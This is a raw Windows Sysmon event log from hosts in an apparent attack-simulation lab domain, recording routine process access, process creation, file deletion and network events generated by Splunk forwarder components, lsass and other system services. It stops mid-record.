10:47:01.717{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:01.717{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-10A5-6216-F004-000000003802}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:01.717{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10A5-6216-F004-000000003802}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:01.718{C8EA50B7-10A5-6216-F004-000000003802}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:01.045{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E28445653C37ACA031C4FB1C6E8463C5,SHA256=77914C9BB63491803AC92788F1233459200C4BA8328B317A3A46F612D3BAE47C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216020Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:02.789{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01212DD62F21582B6A44337F7A4CAF3E,SHA256=5A46397D82932A419096B9663F95910D9A562D55BBAE502D1C68931EA31DCF4F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:02.217{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10A6-6216-F104-000000003802}1924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:02.217{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:02.217{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:02.217{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:02.217{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:02.217{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-10A6-6216-F104-000000003802}1924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:02.217{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10A6-6216-F104-000000003802}1924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:02.218{C8EA50B7-10A6-6216-F104-000000003802}1924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:02.201{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4225729077E4F38A1A5A799E7FB70A09,SHA256=1BC4537F80F585AA38D8EF57767FA4F4CBA84F40EAF1750737C5D50CFF35EE61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216021Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:03.820{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DF330CF3FEE10D95BFC1978FC2FD289,SHA256=C3F5330A2AC1F0756EA2A7542150B41A992BC5755C5C50E95911CAA6EA6B81A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:03.217{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6472E870CC74E5227EA6BC9EF857F1C,SHA256=52F597633FAA1948EA9E63BE7E3FA01437A0F46DA3A50E14319E6CEFA6CB099F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:03.175{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53382-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000287084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:03.175{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53382-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000287083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:04.232{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C3D54879BA479D863329BDA4E71CF5F,SHA256=0ACF305926879601784EC9EC2CD85374242751A672D0B336F617AB87C8EB2744,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216022Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:02.509{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51295-false10.0.1.12-8000- 10341000x8000000000000000287082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:04.107{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10A8-6216-F204-000000003802}3616C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:04.107{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:04.107{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:04.107{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:04.107{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:04.107{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-10A8-6216-F204-000000003802}3616C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:04.107{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10A8-6216-F204-000000003802}3616C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:04.108{C8EA50B7-10A8-6216-F204-000000003802}3616C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216023Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:05.038{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61F1AAAE9105D97B3B784E15BAE73564,SHA256=1263DC47E4793D2A4200C65C4F403D4CE07F80DE645652BEE627B5C4B6F03A74,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:03.612{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53383-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:05.248{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8474E6677A4907C51FB184C649169D50,SHA256=74AE9F685DAFEC6107F2EE841E4732E1DC5F8B6A58E639D723DF3B8FBBDCEF08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216024Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:06.101{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58810259F210B3AECFBD840764C35A00,SHA256=5D546958509D6037C0837020F29D4C87061C9EB1D854001AB535F7C03984AA9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:06.295{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=344DF38233771517AFE2474FD58DC45D,SHA256=7C3B998CFD5FC7C635CF0F49BEED50470D9154E734EEB3EB6794204677CD96AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216025Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:07.226{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 